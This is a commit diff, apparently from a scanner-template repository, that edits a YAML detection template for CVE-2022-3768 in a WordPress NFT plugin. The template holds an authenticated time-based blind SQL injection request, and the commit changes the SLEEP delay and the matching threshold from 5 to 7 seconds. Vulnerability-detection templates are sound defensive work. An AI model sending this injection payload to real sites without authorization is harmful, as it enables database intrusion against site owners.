Update CVE-2022-3768.yaml
parent
4ac99f3c3e
commit
1a04cef30c
|
@ -42,15 +42,15 @@ http:
|
||||||
|
|
||||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||||
- |
|
- |
|
||||||
GET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)&uid=1 HTTP/1.1
|
GET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)&uid=1 HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
- 'duration_2>=5'
|
- 'duration_2>=7'
|
||||||
- 'status_code_2 == 200'
|
- 'status_code_2 == 200'
|
||||||
- 'contains(content_type_2, "text/html")'
|
- 'contains(content_type_2, "text/html")'
|
||||||
- 'contains(body_2, "Batch Mint NFTs")'
|
- 'contains(body_2, "Batch Mint NFTs")'
|
||||||
condition: and
|
condition: and
|
||||||
# digest: 4a0a0047304502205bb782c359a725b2984058e0e651bbdba6fcc66900a008556d94b206c7da4da2022100939b2ae486240f5e9b07c096422b5c39f81487ea2a1357740cc4d97fbf67299a:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a0047304502205bb782c359a725b2984058e0e651bbdba6fcc66900a008556d94b206c7da4da2022100939b2ae486240f5e9b07c096422b5c39f81487ea2a1357740cc4d97fbf67299a:922c64590222798bb761d5b6d8e72950
|
||||||
|
|
Loading…
Reference in New Issue